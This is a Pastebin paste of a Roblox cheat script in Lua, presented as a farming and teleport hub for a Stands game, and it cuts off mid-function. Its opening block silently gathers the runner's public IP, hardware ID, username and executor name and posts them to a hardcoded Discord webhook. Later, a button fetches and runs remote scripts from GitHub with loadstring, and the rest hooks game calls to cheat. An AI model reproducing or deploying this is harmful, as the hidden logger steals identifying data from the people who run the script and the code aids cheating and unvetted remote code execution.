Ameno__GodOH

idk

Nov 21st, 2024
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.11 KB | None | 0 0
  1. --Webhook Log
  2. local WebhookUrl = 'https://discord.com/api/webhooks/1302232309688303617/Iq_R-ijqpO5qKcFIVjtWcWcrYsX8K7okpQlpzf8nhOmcJrZSIHcsPEti64lRlRwJABvf' -- Url Aqui
  3. local HttpService = game:GetService("HttpService")
  4. local requestt = http_request or request or syn.request
  5. local body = requestt({Url = "https://httpbin.org/get"; Method = "GET"}).Body;
  6. local decoded = game:GetService("HttpService"):JSONDecode(body)
  7. local ip = decoded.origin
  8. local PlaceID = game.PlaceId
  9. local Client = game.Players.LocalPlayer
  10. local Path = "http://www.roblox.com/asset/?id="
  11. local avatar_response = request({
  12. Url = "https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=" ..
  13. Client.UserId .. "&size=420x420&format=png",
  14. Method = "GET"
  15. })
  16. if avatar_response.StatusCode ~= 200 then
  17. fail("Something went wrong in your experience! Please try again later!")
  18. return
  19. end
  20. local access = HttpService:JSONDecode(avatar_response.Body)
  21. local headers = {
  22. ["Content-Type"] = "application/json"
  23. }
  24. local data = {
  25. ["username"] = "Realm Hub Script Log",
  26. ["avatar_url"] = "https://github.com/user-attachments/assets/94be3d99-fc0c-4ed5-9929-e9ca1a89122d",
  27. ["embeds"] = {
  28. {
  29. ["title"] = "Script Executed :",
  30. ["type"] = "rich",
  31. ["color"] = tonumber(15548997),
  32. ["thumbnail"] = {
  33. ["url"] = access.data[1].imageUrl
  34. },
  35. ["fields"] = {
  36. {
  37. ["name"] = 'Username / User ID',
  38. ["value"] = "```".. game:GetService("Players").LocalPlayer.Name .. " / " .. game:GetService("Players").LocalPlayer.UserId .."```",
  39. ["inline"] = false
  40. },
  41. {
  42. ["name"] = 'User IP',
  43. ["value"] = "```".. tostring(ip) .."```",
  44. ["inline"] = true
  45. },
  46. {
  47. ["name"] = 'Executor',
  48. ["value"] = "```".. identifyexecutor() .."```",
  49. ["inline"] = true
  50. },
  51. {
  52. ["name"] = 'HWID',
  53. ["value"] = "```".. game:GetService("RbxAnalyticsService"):GetClientId() .."```",
  54. ["inline"] = false
  55. },
  56. {
  57. ["name"] = 'Job ID',
  58. ["value"] = "```"..game.JobId.."```",
  59. ["inline"] = false
  60. },
  61. {
  62. ["name"] = 'Join Script',
  63. ["value"] = "```lua" .. "\n" .. "game.ReplicatedStorage['__ServerBrowser']:InvokeServer('teleport','" .. game.JobId .. "')" .. "```",
  64. ["inline"] = false
  65. },
  66. {
  67. ["name"] = 'Profile Link',
  68. ["value"] = "[Click Here](https://www.roblox.com/users/".. game:GetService("Players").LocalPlayer.UserId .. "/profile)",
  69. ["inline"] = true
  70. },
  71. {
  72. ["name"] = 'Game Link',
  73. ["value"] = "[Click Here](https://www.roblox.com/games/" .. game.PlaceId .. ")",
  74. ["inline"] = true
  75. }
  76. },
  77. ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%S")
  78. }
  79. }
  80. }
  81. local newdata = HttpService:JSONEncode(data)
  82. requestt({Url = WebhookUrl, Body = newdata, Method = "POST", Headers = headers})
  83.  
  84. local VirtualUser = game:GetService("VirtualUser")
  85.  
  86. function AFAICPiiDc(code)
  87. local res = ''
  88. for i in ipairs(code) do
  89. res = res .. string.char(code[i] / 105)
  90. end
  91. return res
  92. end
  93.  
  94. -- Obtém o serviço VirtualInputManager
  95. local VirtualInputManager = game:GetService(AFAICPiiDc({9030, 11025, 11970, 12180, 12285, 10185, 11340, 7665, 11550, 11760, 12285, 12180, 8085, 10185, 11550, 10185, 10815, 10605, 11970}))
  96.  
  97. -- Função para pressionar e soltar a tecla R após 10 segundos
  98. local function pressKeyR()
  99. -- Simula o pressionamento da tecla R
  100. VirtualInputManager:SendKeyEvent(true, Enum.KeyCode.R, false, game)
  101. print("Tecla R pressionada")
  102.  
  103. wait(0.1) -- Aguarda 10 segundos
  104.  
  105. -- Simula o soltar da tecla R
  106. VirtualInputManager:SendKeyEvent(false, Enum.KeyCode.R, false, game)
  107. print("Tecla R solta")
  108. end
  109.  
  110. function AFAICPiiDc(code)
  111. local res = ''
  112. for i in ipairs(code) do
  113. res = res .. string.char(code[i] / 105)
  114. end
  115. return res
  116. end
  117.  
  118. -- Obtém o serviço VirtualInputManager (decodificado para facilitar a leitura)
  119. local VirtualInputManager = game:GetService(AFAICPiiDc({9030, 11025, 11970, 12180, 12285, 10185, 11340, 7665, 11550, 11760, 12285, 12180, 8085, 10185, 11550, 10185, 10815, 10605, 11970}))
  120.  
  121. -- Função para pressionar e soltar a tecla E
  122. local function pressKeyE()
  123. -- Simula o pressionamento da tecla E
  124. VirtualInputManager:SendKeyEvent(true, Enum.KeyCode.E, false, game)
  125. wait(0.1) -- Aguardando um curto período de tempo
  126. -- Simula o soltar da tecla E
  127. VirtualInputManager:SendKeyEvent(false, Enum.KeyCode.E, false, game)
  128. end
  129.  
  130. local VirtualInputManager = game:GetService("VirtualInputManager")
  131. local ReplicatedStorage = game:GetService("ReplicatedStorage")
  132. local StarterGui = game:GetService("StarterGui")
  133. local Players = game:GetService("Players")
  134.  
  135. local IsUncanny = (game.PlaceId == 11423379012 or game.PlaceId == 11423467063)
  136.  
  137. local Purchase = not IsUncanny and ReplicatedStorage.Purchase
  138. local Anchor = not IsUncanny and ReplicatedStorage.Anchor
  139. local Events = not IsUncanny and ReplicatedStorage.Main
  140.  
  141. local Input = not IsUncanny and Events.Input
  142.  
  143. local Player = Players.LocalPlayer
  144. local Mouse = Player:GetMouse()
  145.  
  146. local Data = not IsUncanny and Player.Data
  147. local StandUser = not IsUncanny and Data.Stand
  148. local Money = not IsUncanny and Data.Money
  149.  
  150. local Camera = workspace.CurrentCamera
  151.  
  152. local KeyCodes = {
  153. Enum.KeyCode.E
  154. }
  155.  
  156. local _ENV = getgenv()
  157.  
  158. local Infinites = {
  159. Esmerald = function(Value)
  160. _ENV.InfEsmerald = Value
  161.  
  162. local ShiftLock = Player.PlayerGui.MobileShiftLock.MiddleIcon.MouseLockLabel
  163.  
  164. while _ENV.InfEsmerald do task.wait()
  165. if Player.Backpack:FindFirstChild("HierophantGreen") then
  166. local Target;
  167. if ShiftLock.Visible and Player.Character then
  168. local Position = Player.Character:GetPivot().Position
  169. local Direction = Camera.CFrame.LookVector
  170.  
  171. Target = CFrame.new(Position + Direction * 250)
  172. else
  173. Target = CFrame.new(Mouse.Hit.X, Mouse.Hit.Y + 1, Mouse.Hit.Z)
  174. end
  175. Input:FireServer("Alternate", "EmeraldProjectile2", false, Target)
  176. else
  177. task.wait(1)
  178. end
  179. end
  180. end,
  181. Shadow = function(Value)
  182. _ENV.InfShadow = Value
  183.  
  184. while _ENV.InfShadow do task.wait(1)
  185. Input:FireServer("Alternate", "STWRTZ", true)
  186. end
  187. end,
  188. Golden = function(Value)
  189. _ENV.InfGolden = Value
  190.  
  191. while _ENV.InfGolden do task.wait(1)
  192. if Player.Backpack:FindFirstChild("GoldExperience") then
  193. Input:FireServer("Alternate", "RTZ", true)
  194. end
  195. end
  196. end
  197. }
  198.  
  199. local Teleport = {
  200. List = {"Merchant", "Sans Quest", "Alucard Quest", "Farming Zone", "Boss Arena", "D4C Dimension", "Tim", "Timmy"},
  201. CFrames = {
  202. Merchant = CFrame.new(1250, 403, -675),
  203. ["Sans Quest"] = CFrame.new(826, 403, -312),
  204. ["Alucard Quest"] = CFrame.new(1274, 402, -557),
  205. ["Farming Zone"] = CFrame.new(-295, 462, -1491),
  206. ["Boss Arena"] = CFrame.new(1488, 390, -635),
  207. ["D4C Dimension"] = CFrame.new(-3091, 464, -417),
  208. Tim = CFrame.new(1166, 403, -607),
  209. Timmy = CFrame.new(1129, 403, -689)
  210. }
  211. }
  212.  
  213. local ItemsPrice = {
  214. ["Arrow"] = 500,
  215. ["Rokakaka Fruit"] = 250
  216. }
  217.  
  218. local dbInput = nil;
  219.  
  220. local function BuyItem(Name)
  221. local Price = ItemsPrice[Name]
  222.  
  223. if not Price or Money.Value >= Price then
  224. Purchase:FireServer(Name)
  225. return true
  226. end
  227.  
  228. return false
  229. end
  230.  
  231. local function AttackEnemy(Target)
  232. if Target then
  233. if Player.Backpack:FindFirstChild("HierophantGreen") then
  234. Input:FireServer("Alternate", "EmeraldProjectile2", false, Target.CFrame)
  235. return nil
  236. end
  237.  
  238. -- outras coisas
  239. end
  240.  
  241. if dbInput and (tick() - dbInput) <= 1 then
  242. return nil
  243. end
  244.  
  245. dbInput = tick()
  246.  
  247. for i = 1, #KeyCodes do
  248. local key = KeyCodes[i]
  249. VirtualInputManager:SendKeyEvent(true, key, false, game)
  250. VirtualInputManager:SendKeyEvent(false, key, false, game)
  251. end
  252. end
  253.  
  254. local function Collect(Handle)
  255. repeat task.wait() until Player.Character and Player.Character.PrimaryPart
  256. if Handle then
  257. firetouchinterest(Player.Character.PrimaryPart, Handle, 0)
  258. end
  259. end
  260.  
  261. local function IsStandUser()
  262. return StandUser.Value ~= 1
  263. end
  264.  
  265. local function CollectItem(Name)
  266. for _,item in ipairs(workspace:GetChildren()) do
  267. if item.Name == Name and item:IsA("Tool") and item:FindFirstChild("Handle") then
  268. Collect(item.Handle)
  269. return nil
  270. end
  271. end
  272. end
  273.  
  274. local function Notify(Title, Content)
  275. return StarterGui:SetCore("SendNotification", {
  276. Title = Title,
  277. Text = Content,
  278. Duration = 10,
  279. })
  280. end
  281.  
  282. local function IsAlive(Char)
  283. local Hum = Char and Char:FindFirstChild("Humanoid")
  284. return Hum and Hum.Health > 0
  285. end
  286.  
  287. local Stands = {
  288. "Anubis",
  289. "D4C",
  290. "OMT",
  291. "CrazyDiamond",
  292. "DoppioKingCrimson",
  293. "KillerQueen",
  294. "GoldExperience",
  295. "StarPlatinum",
  296. "StarPlatinumTW",
  297. "TheWorld",
  298. "HierophantGreen",
  299. "Whitesnake",
  300. "TheWorldAlternateUniverse",
  301. "WhitesnakeAU",
  302. "KingCrimsonAU",
  303. "SoftAndWetShiny",
  304. "StarPlatinumOVA",
  305. "TheWorldOVA",
  306. "NTWAU",
  307. "CreeperQueen",
  308. "SPTW",
  309. "StickyFingers",
  310. "SoftAndWet"
  311. }
  312.  
  313. local StandSlots = {
  314.  
  315. }
  316.  
  317. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua", true))()
  318. local Window = Library.CreateLib("Mandy Stands Awakening", "DarkTheme")
  319.  
  320. local MainTab = Window:NewTab("Main Farm")
  321. local BossTab = Window:NewTab("Boss Farm")
  322. local TeleportTab = Window:NewTab("Map Teleport")
  323. local StandTab = Window:NewTab("Stand Farm")
  324. local MiscTab = Window:NewTab("Misc")
  325. local SettingsTab = Window:NewTab("Settings")
  326.  
  327. local SectionBoss = BossTab:NewSection("Farm Boss")
  328. local SectionMain = MainTab:NewSection("Farm Item")
  329. local SectionTeleport = TeleportTab:NewSection("Teleport Areas")
  330. local SectionStand = StandTab:NewSection("Stands Farm")
  331. local SectionMisc = MiscTab:NewSection("Skills And Features")
  332.  
  333. SectionMain:NewToggle("Auto Farm Item", "Bring all items spawneds", function(Value)
  334. _ENV.AutoItems = Value
  335.  
  336. while _ENV.AutoItems do task.wait()
  337. for _,Child in ipairs(workspace:GetChildren()) do
  338. if Child:IsA("Tool") and Child.Name ~= "Banknote" and Child:FindFirstChild("Handle") then
  339. Collect(Child.Handle)
  340. end
  341. end
  342. end
  343. end)
  344.  
  345. SectionMain:NewToggle("Auto Farm Banknote", "Bring Banknotes and use", function(Value)
  346. _ENV.AutoBanknote = Value
  347.  
  348. while _ENV.AutoBanknote do task.wait()
  349. local Character = Player.Character
  350.  
  351. if Character and Character:FindFirstChild("Humanoid") then
  352. local Banknote = Player.Backpack:FindFirstChild("Banknote") or Player.Character:FindFirstChild("Banknote")
  353.  
  354. if Banknote then
  355. while Banknote.Parent ~= Character do task.wait()
  356. Character.Humanoid:EquipTool(Banknote)
  357. end
  358. Banknote:Activate()
  359. end
  360. end
  361.  
  362. local wsBanknote = workspace:FindFirstChild("Banknote")
  363.  
  364. if wsBanknote and wsBanknote:FindFirstChild("Handle") then
  365. Collect(wsBanknote.Handle)
  366. end
  367. end
  368. end)
  369.  
  370. SectionBoss:NewButton("Auto Uncanny Boss", "don't be uncanny", function()
  371.  
  372. local hitboxSize = Vector3.new(30, 30, 30) -- Tamanho da hitbox
  373. local hitbox
  374.  
  375. -- Executa o loop em uma corrotina
  376. coroutine.wrap(function()
  377. while true do
  378. local targetObject = workspace:FindFirstChild("TrollPrism") -- Verifica constantemente pelo objeto
  379.  
  380. if targetObject then
  381. -- Verifica se a hitbox já foi criada; se não, cria uma nova
  382. if not hitbox then
  383. hitbox = Instance.new("Part")
  384. hitbox.Size = hitboxSize
  385. hitbox.Color = Color3.fromRGB(255, 0, 0) -- Cor vermelha
  386. hitbox.Anchored = true
  387. hitbox.CanCollide = false
  388. hitbox.Transparency = 0.5 -- Levemente transparente
  389. hitbox.Material = Enum.Material.SmoothPlastic
  390. hitbox.Parent = workspace
  391.  
  392. -- Função para adicionar textura em cada face da hitbox
  393. local function addTexture(face)
  394. local texture = Instance.new("Texture")
  395. texture.Texture = "rbxassetid://102681111497143" -- Substitua pelo ID de textura válido
  396. texture.StudsPerTileU = 30 -- Ajuste para repetir em toda a face
  397. texture.StudsPerTileV = 30
  398. texture.Face = face -- Aplica a textura na face específica
  399. texture.Parent = hitbox
  400. end
  401.  
  402. -- Adiciona a textura para todas as faces
  403. addTexture(Enum.NormalId.Front)
  404. addTexture(Enum.NormalId.Back)
  405. addTexture(Enum.NormalId.Left)
  406. addTexture(Enum.NormalId.Right)
  407. addTexture(Enum.NormalId.Top)
  408. addTexture(Enum.NormalId.Bottom)
  409. end
  410.  
  411. -- Atualiza a posição da hitbox para seguir o objeto
  412. if hitbox then
  413. hitbox.CFrame = targetObject.CFrame -- Faz a hitbox seguir o objeto
  414. end
  415. else
  416. -- Se o objeto não estiver presente, remove a hitbox se ela existir
  417. if hitbox then
  418. hitbox:Destroy() -- Remove a hitbox do workspace
  419. hitbox = nil -- Limpa a referência da hitbox
  420. end
  421. end
  422.  
  423. wait(0.1) -- Espera um pouco antes de verificar novamente
  424. end
  425. end)() -- Inicia a corrotina
  426.  
  427. -- Executa os outros scripts
  428. loadstring(game:HttpGet("https://raw.githubusercontent.com/Gabiruvei/Ameno/08142f5310d688772d1f0303a551563184374100/Ameno_Script"))()
  429. loadstring(game:HttpGet("https://raw.githubusercontent.com/Gabiruvei/Ameno_x/2b7b8828652ba7ab3dd2903f34d988419dfbfe76/ameno_x"))()
  430. wait(2)
  431.  
  432. end)
  433.  
  434. local AutoHamonBossFarmActive = false
  435. SectionBoss:NewToggle("Auto Kill Hamon Boss", "STW Recommended", function(Value)
  436. AutoHamonBossFarmActive = Value
  437.  
  438. if AutoHamonBossFarmActive then
  439. -- Lógica de Auto Farm para Hamon Boss
  440. local function FarmHamonBoss()
  441. while AutoHamonBossFarmActive do
  442. task.wait()
  443. local hamonBoss = workspace:FindFirstChild("Hamon Boss") -- Supondo que o boss se chame "Hamon Boss"
  444. if hamonBoss and hamonBoss:FindFirstChild("HumanoidRootPart") then
  445. -- Teleporta para o Hamon Boss
  446. Player.Character.HumanoidRootPart.CFrame = hamonBoss.HumanoidRootPart.CFrame
  447.  
  448. pressKeyE()
  449. pressKeyR()
  450. -- Ataca o Hamon Boss
  451. end
  452. end
  453. end
  454.  
  455. -- Se o jogador morrer, retente
  456. Player.CharacterAdded:Connect(function()
  457. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  458. task.wait(0.1)
  459. end
  460. FarmHamonBoss()
  461. end)
  462.  
  463. -- Começa o farm
  464. FarmHamonBoss()
  465. end
  466. end)
  467.  
  468. local AutoReaverFarmActive = false
  469. SectionBoss:NewToggle("Auto Kill Reaver Boss", "STW or Hierophant Green Recomended", function(Value)
  470. AutoReaverFarmActive = Value
  471.  
  472. if AutoReaverFarmActive then
  473. -- Auto Farm Reaver Boss Logic
  474. local function FarmReaverBoss()
  475. while AutoReaverFarmActive do
  476. task.wait()
  477. local reaverBoss = workspace:FindFirstChild("Halloween Boss") -- Supondo que o boss se chame "ReaverBoss"
  478. if reaverBoss and reaverBoss:FindFirstChild("HumanoidRootPart") then
  479. -- Teleporta para o Reaver Boss
  480. Player.Character.HumanoidRootPart.CFrame = reaverBoss.HumanoidRootPart.CFrame
  481.  
  482. pressKeyE()
  483. pressKeyR()
  484. -- Ataca o Reaver Boss
  485. end
  486. end
  487. end
  488.  
  489. -- Se o jogador morrer, retente
  490. Player.CharacterAdded:Connect(function()
  491. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  492. task.wait(0.1)
  493. end
  494. FarmReaverBoss()
  495. end)
  496.  
  497. -- Começa o farm
  498. FarmReaverBoss()
  499. end
  500. end)
  501.  
  502. -- AUTO ALUCARD YOOO
  503.  
  504. local AutoAlucardFarmActive = false
  505. SectionBoss:NewToggle("Auto Kill Alucard Boss", "STW Recomended", function(Value)
  506. AutoAlucardFarmActive = Value
  507.  
  508. if AutoAlucardFarmActive then
  509. -- Auto Farm Alucard Boss Logic
  510. local function FarmAlucardBoss()
  511. while AutoAlucardFarmActive do
  512. task.wait()
  513. local alucardBoss = workspace:FindFirstChild("Alucard Boss") -- Supondo que o boss se chame "AlucardBoss"
  514. if alucardBoss and alucardBoss:FindFirstChild("HumanoidRootPart") then
  515. -- Teleporta para o Alucard Boss
  516. Player.Character.HumanoidRootPart.CFrame = alucardBoss.HumanoidRootPart.CFrame
  517.  
  518. pressKeyE()
  519. pressKeyR()
  520. -- Ataca o Alucard Boss
  521. end
  522. end
  523. end
  524.  
  525. -- Se o jogador morrer, retente
  526. Player.CharacterAdded:Connect(function()
  527. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  528. task.wait(0.1)
  529. end
  530. FarmAlucardBoss()
  531. end)
  532.  
  533. -- Começa o farm
  534. FarmAlucardBoss()
  535. end
  536. end)
  537.  
  538. for _,Area in ipairs(Teleport.List) do
  539. SectionTeleport:NewButton("Teleport to " .. Area, "", function()
  540. if Player.Character and Player.Character:FindFirstChild("HumanoidRootPart") then
  541. Player.Character.HumanoidRootPart.CFrame = Teleport.CFrames[Area]
  542. end
  543. end)
  544. end
  545.  
  546. -- anti time stop
  547. SectionMisc:NewToggle("Anti Time Stop", "No Stand Nedees", function(Value)
  548. _ENV.AntiTimeStop = Value
  549. end)
  550.  
  551. -- SectionMisc:NewToggle("Infinity Damage Reflection", "Golden Experience Needed", Infinites.Golden)
  552. -- SectionMisc:NewToggle("Infinity Dio Dodge", "Shadow The World Needed", Infinites.Shadow)
  553.  
  554. SectionMisc:NewButton("Infinity Damage Reflection", "Golden Experience Needed", function()
  555. Input:FireServer("Alternate", "RTZ", true)
  556. end)
  557.  
  558. SectionMisc:NewButton("Infinity Dio Dodge", "Shadow The World Needed", function()
  559. Input:FireServer("Alternate", "STWRTZ", true)
  560. end)
  561.  
  562. SectionMisc:NewButton("Reduce Damage", "Any Stand", function()
  563. local args = {
  564. [1] = "Alternate",
  565. [2] = "Block"
  566. }
  567.  
  568. game:GetService("ReplicatedStorage").Main.Input:FireServer(unpack(args))
  569.  
  570. -- Obtém o jogador local
  571. local player = game.Players.LocalPlayer
  572.  
  573. -- Loop para manter a velocidade em 100
  574. while true do
  575. -- Verifica se o jogador tem um personagem
  576. if player.Character then
  577. -- Obtém o Humanoid do personagem
  578. local humanoid = player.Character:FindFirstChildOfClass("Humanoid")
  579.  
  580. if humanoid and humanoid.WalkSpeed ~= 100 then
  581. -- Define a velocidade para 100 se for diferente
  582. humanoid.WalkSpeed = 27
  583. print("Velocidade ajustada para 100")
  584. end
  585. end
  586.  
  587. -- Aguarda 0.1 segundo antes de verificar novamente
  588. wait()
  589. end
  590. end)
  591.  
  592.  
  593. SectionMisc:NewToggle("Infinity Emerald Splash", "Hierophant Green Needed", Infinites.Esmerald)
  594.  
  595. SectionStand:NewDropdown("Select stand", "Select stand to farm", Stands, function(Value)
  596. _ENV.SelectedStand = Value
  597. end)
  598.  
  599. SectionStand:NewToggle("Farm Stand", "auto farm selected stand", function(Value)
  600. while not _ENV.SelectedStand do task.wait() end
  601.  
  602. _ENV.FarmStand = Value
  603.  
  604. if Player.Backpack:FindFirstChild(_ENV.SelectedStand) then
  605. return Notify("Stand Farm", "stand successfully acquired")
  606. end
  607.  
  608. while _ENV.FarmStand do task.wait(2)
  609. local Stand = _ENV.SelectedStand
  610.  
  611. local Backpack = Player.Backpack
  612. local Character = Player.Character
  613.  
  614. local hasStand = Backpack:FindFirstChild(Stand)
  615.  
  616. if hasStand then
  617. Notify("Stand Farm", "stand successfully acquired")
  618. _ENV.FarmStand = false
  619. elseif IsAlive(Character) then
  620. local RootPart = Character:FindFirstChild("HumanoidRootPart")
  621.  
  622. if RootPart then
  623. RootPart.CFrame = CFrame.new(-316, 469, -1503)
  624.  
  625. if IsStandUser() then
  626. local Rokakaka = Character:FindFirstChild("Rokakaka Fruit") or Backpack:FindFirstChild("Rokakaka Fruit")
  627.  
  628. if Rokakaka then
  629. if Rokakaka.Parent == Character then
  630. ReplicatedStorage.ItemEvents.Roka:FireServer()
  631. repeat task.wait(2) until not IsStandUser() or not _ENV.FarmStand
  632. else
  633. Character.Humanoid:EquipTool(Rokakaka)
  634. end
  635. else
  636. CollectItem("Rokakaka Fruit")
  637. end
  638. else
  639. local Arrow = Character:FindFirstChild("Arrow") or Backpack:FindFirstChild("Arrow")
  640.  
  641. if Arrow then
  642. if Arrow.Parent == Character then
  643. repeat Arrow:Activate() task.wait() until not Arrow or IsStandUser() or not _ENV.FarmStand
  644. else
  645. Character.Humanoid:EquipTool(Arrow)
  646. end
  647. else
  648. CollectItem("Arrow")
  649. end
  650. end
  651. end
  652. end
  653. end
  654. end)
  655.  
  656. if not _ENV.laTimeStop then
  657. _ENV.laTimeStop = true
  658.  
  659. local old;
  660. old = hookmetamethod(game, "__namecall", function(self, ...)
  661. if self == Anchor and getnamecallmethod():lower() == "fireserver" then
  662. if _ENV.AntiTimeStop and select(2, ...) == true then
  663. return nil
  664. end
  665. end
  666. return old(self, ...)
  667. end)
  668. end
  669.  
  670. local SectionSettings = SettingsTab:NewSection("Script Settings")
  671.  
  672. SectionSettings:NewToggle("Anti AFK", "Dont Be Kicked", function(Value)
  673. _ENV.AntiAfk = Value
  674. end)
  675.  
  676. Player.Idled:Connect(function()
  677. if _ENV.AntiAfk then
  678. VirtualUser:Button2Down(Vector2.new(0, 0), Camera.CFrame)
  679. VirtualUser:Button2Up(Vector2.new(0, 0), Camera.CFrame)
  680. end
  681. end)
  682.  
  683. if not _ENV.laTimeStop then
  684. _ENV.laTimeStop = true
  685.  
  686. local old;
  687. old = hookmetamethod(game, "__namecall", function(self, ...)
  688. if self == Anchor and getnamecallmethod():lower() == "fireserver" then
  689. if _ENV.AntiTimeStop and select(2, ...) == true then
  690. return nil
  691. end
  692. end
  693. return old(self, ...)
  694. end)
  695. end
  696.  
  697. local SectionBoss2 = BossTab:NewSection("Auto Farm Npc's Quest (STW)")
  698.  
  699.  
  700. -- Vampire farm
  701. local AutoVampireFarmActive = false
  702. SectionBoss2:NewToggle("Auto Kill Vampire", "STW Recommended", function(Value)
  703. AutoVampireFarmActive = Value
  704.  
  705. if AutoVampireFarmActive then
  706. -- Função para farmar Vampire NPCs
  707. local function FarmVampireNpc()
  708. while AutoVampireFarmActive do
  709. task.wait(0.1)
  710.  
  711. -- Busca o primeiro Vampire disponível
  712. local VampireNpc = nil
  713. for _, npc in pairs(workspace:GetChildren()) do
  714. if npc.Name == "Vampire" and npc:FindFirstChild("HumanoidRootPart") then
  715. VampireNpc = npc
  716. break -- Seleciona o primeiro e para a busca
  717. end
  718. end
  719.  
  720. -- Se houver um Vampire disponível
  721. if VampireNpc then
  722. -- Teleporta para o Vampire e realiza as ações
  723. while AutoVampireFarmActive and VampireNpc and VampireNpc.Parent do
  724. -- Teleporta para o Vampire
  725. Player.Character.HumanoidRootPart.CFrame = VampireNpc.HumanoidRootPart.CFrame
  726.  
  727. -- Pressiona as teclas para atacar
  728. pressKeyE()
  729. pressKeyR()
  730. end
  731. end
  732. end
  733. end
  734.  
  735. -- Caso o jogador morra, retenta o farm
  736. Player.CharacterAdded:Connect(function()
  737. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  738. task.wait(0.1)
  739. end
  740. FarmVampireNpc()
  741. end)
  742.  
  743. -- Começa o farm
  744. FarmVampireNpc()
  745. end
  746. end)
  747.  
  748.  
  749. -- Skeleton farm
  750. local AutoSkeletonFarmActive = false
  751. SectionBoss2:NewToggle("Auto Kill Skeleton", "STW Recommended", function(Value)
  752. AutoSkeletonFarmActive = Value
  753.  
  754. if AutoSkeletonFarmActive then
  755. -- Função para farmar Skeleton NPCs
  756. local function FarmSkeletonNpc()
  757. while AutoSkeletonFarmActive do
  758. task.wait(0.1)
  759.  
  760. -- Busca o primeiro Skeleton disponível
  761. local SkeletonNpc = nil
  762. for _, npc in pairs(workspace:GetChildren()) do
  763. if npc.Name == "Skeleton" and npc:FindFirstChild("HumanoidRootPart") then
  764. SkeletonNpc = npc
  765. break -- Seleciona o primeiro e para a busca
  766. end
  767. end
  768.  
  769. -- Se houver um Skeleton disponível
  770. if SkeletonNpc then
  771. -- Teleporta para o Skeleton e realiza as ações
  772. while AutoSkeletonFarmActive and SkeletonNpc and SkeletonNpc.Parent do
  773. -- Teleporta para o Skeleton
  774. Player.Character.HumanoidRootPart.CFrame = SkeletonNpc.HumanoidRootPart.CFrame
  775.  
  776. -- Pressiona as teclas para atacar
  777. pressKeyE()
  778. pressKeyR()
  779.  
  780. task.wait(0.1) -- Intervalo entre os ataques
  781. end
  782. end
  783. end
  784. end
  785.  
  786. -- Caso o jogador morra, retenta o farm
  787. Player.CharacterAdded:Connect(function()
  788. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  789. task.wait(0.1)
  790. end
  791. FarmSkeletonNpc()
  792. end)
  793.  
  794. -- Começa o farm
  795. FarmSkeletonNpc()
  796. end
  797. end)
  798.  
  799. local AutoBanditFarmActive = false
  800. SectionBoss2:NewToggle("Auto Kill Bandit", "STW Recommended", function(Value)
  801. AutoBanditFarmActive = Value
  802.  
  803. if AutoBanditFarmActive then
  804. -- Função para farmar Bandit NPCs
  805. local function FarmBanditNpc()
  806. while AutoBanditFarmActive do
  807. task.wait(0.1)
  808.  
  809. -- Busca o primeiro Bandit disponível
  810. local BanditNpc = nil
  811. for _, npc in pairs(workspace:GetChildren()) do
  812. if npc.Name == "Bandit" and npc:FindFirstChild("HumanoidRootPart") then
  813. BanditNpc = npc
  814. break -- Seleciona o primeiro e para a busca
  815. end
  816. end
  817.  
  818. -- Se houver um Bandit disponível
  819. if BanditNpc then
  820. -- Teleporta para o Bandit e realiza as ações
  821. while AutoBanditFarmActive and BanditNpc and BanditNpc.Parent do
  822. -- Teleporta para o Bandit
  823. Player.Character.HumanoidRootPart.CFrame = BanditNpc.HumanoidRootPart.CFrame
  824.  
  825. -- Pressiona as teclas para atacar
  826. pressKeyE()
  827. pressKeyR()
  828.  
  829. task.wait(0.1) -- Intervalo entre os ataques
  830. end
  831. end
  832. end
  833. end
  834.  
  835. -- Caso o jogador morra, retenta o farm
  836. Player.CharacterAdded:Connect(function()
  837. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  838. task.wait(0.1)
  839. end
  840. FarmBanditNpc()
  841. end)
  842.  
  843. -- Começa o farm
  844. FarmBanditNpc()
  845. end
  846. end)
  847.  
  848. local SectionBoss3 = BossTab:NewSection("Auto Farm Npc's Quest (Sonic)")
  849.  
  850. local AutoVampireFarmActive = false
  851. SectionBoss3:NewToggle("Auto Kill Vampire (Sonic)", "Sonic Needed", function(Value)
  852. AutoVampireFarmActive = Value
  853.  
  854. if AutoVampireFarmActive then
  855. -- Função para farmar Vampire NPCs
  856. local function FarmVampireNpc()
  857. while AutoVampireFarmActive do
  858. task.wait(0.5) -- Pausa para evitar loop infinito
  859.  
  860. -- Busca o primeiro Vampire disponível
  861. local VampireNpc = nil
  862. for _, npc in pairs(workspace:GetChildren()) do
  863. if npc.Name == "Vampire" and npc:FindFirstChild("HumanoidRootPart") then
  864. VampireNpc = npc
  865. break -- Seleciona o primeiro e para a busca
  866. end
  867. end
  868.  
  869. -- Se houver um Vampire disponível
  870. if VampireNpc then
  871. -- Teleporta para o Vampire e realiza as ações
  872. while AutoVampireFarmActive and VampireNpc and VampireNpc.Parent do
  873. -- Teleporta para o Vampire
  874. Player.Character.HumanoidRootPart.CFrame = VampireNpc.HumanoidRootPart.CFrame
  875. task.wait(0.5) -- Pausa durante a ação
  876. end
  877. end
  878. end
  879. end
  880.  
  881. -- Caso o jogador morra, retenta o farm
  882. Player.CharacterAdded:Connect(function()
  883. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  884. task.wait(0.1)
  885. end
  886. FarmVampireNpc()
  887. end)
  888.  
  889. -- Começa o farm
  890. FarmVampireNpc()
  891. end
  892. end)
  893.  
  894. -- Farm Skeleton
  895. local AutoSkeletonFarmActive = false
  896. SectionBoss3:NewToggle("Auto Kill Skeleton (Sonic)", "Sonic Needed", function(Value)
  897. AutoSkeletonFarmActive = Value
  898.  
  899. if AutoSkeletonFarmActive then
  900. -- Função para farmar Skeleton NPCs
  901. local function FarmSkeletonNpc()
  902. while AutoSkeletonFarmActive do
  903. task.wait(0.5) -- Pausa para evitar loop infinito
  904.  
  905. -- Busca o primeiro Skeleton disponível
  906. local SkeletonNpc = nil
  907. for _, npc in pairs(workspace:GetChildren()) do
  908. if npc.Name == "Skeleton" and npc:FindFirstChild("HumanoidRootPart") then
